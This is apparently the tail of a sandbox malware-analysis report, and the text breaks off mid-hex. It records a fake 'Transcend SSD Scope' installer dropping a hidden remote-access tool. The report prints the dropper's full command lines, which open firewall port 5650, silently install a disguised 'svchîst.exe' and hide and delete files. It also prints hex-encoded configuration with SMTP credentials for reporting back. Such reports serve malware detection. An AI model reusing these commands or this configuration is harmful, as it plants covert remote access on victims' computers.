N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
N/A N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\drivers\svchîst.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4824 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Windows\SysWOW64\cmd.exe
PID 4824 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Windows\SysWOW64\cmd.exe
PID 4824 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Windows\SysWOW64\cmd.exe
PID 4824 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Windows\SysWOW64\cmd.exe
PID 4824 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Windows\SysWOW64\cmd.exe
PID 4824 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Windows\SysWOW64\cmd.exe
PID 2180 wrote to memory of 4016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2180 wrote to memory of 4016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2180 wrote to memory of 4016 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4044 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4044 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4044 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4824 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe
PID 4824 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe
PID 4824 wrote to memory of 2348 N/A C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe
PID 4044 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4044 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4044 wrote to memory of 4696 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2180 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2180 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2180 wrote to memory of 3664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2180 wrote to memory of 2744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2180 wrote to memory of 2744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2180 wrote to memory of 2744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2180 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2180 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2180 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2348 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe C:\Users\Admin\AppData\Local\Temp\is-7OFTP.tmp\setup.tmp
PID 2348 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe C:\Users\Admin\AppData\Local\Temp\is-7OFTP.tmp\setup.tmp
PID 2348 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe C:\Users\Admin\AppData\Local\Temp\is-7OFTP.tmp\setup.tmp
PID 2180 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2180 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2180 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2180 wrote to memory of 556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 2180 wrote to memory of 556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 2180 wrote to memory of 556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 556 wrote to memory of 3512 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 556 wrote to memory of 3512 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 556 wrote to memory of 3512 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 556 wrote to memory of 4936 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 556 wrote to memory of 4936 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 556 wrote to memory of 4936 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 556 wrote to memory of 3344 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 556 wrote to memory of 3344 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 556 wrote to memory of 3344 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 556 wrote to memory of 1808 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 556 wrote to memory of 1808 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 556 wrote to memory of 1808 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe
PID 3512 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3512 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3512 wrote to memory of 4748 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2180 wrote to memory of 1452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2180 wrote to memory of 1452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2180 wrote to memory of 1452 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4936 wrote to memory of 3384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4936 wrote to memory of 3384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4936 wrote to memory of 3384 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3344 wrote to memory of 3608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3344 wrote to memory of 3608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3344 wrote to memory of 3608 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1808 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1808 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1808 wrote to memory of 816 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2180 wrote to memory of 2060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\svchîst.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe

"C:\Users\Admin\AppData\Local\Temp\59d16c89e7feb175c39275b73449f9499728cbb003eee351b83bbbcfc97c9322.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe

"C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening TCP 5650 "Open Port 5650"

C:\Users\Admin\AppData\Local\Temp\is-7OFTP.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-7OFTP.tmp\setup.tmp" /SL5="$60044,2911413,332288,C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe"

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650

C:\Windows\SysWOW64\drivers\install.exe

"C:\Windows\System32\drivers\install.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f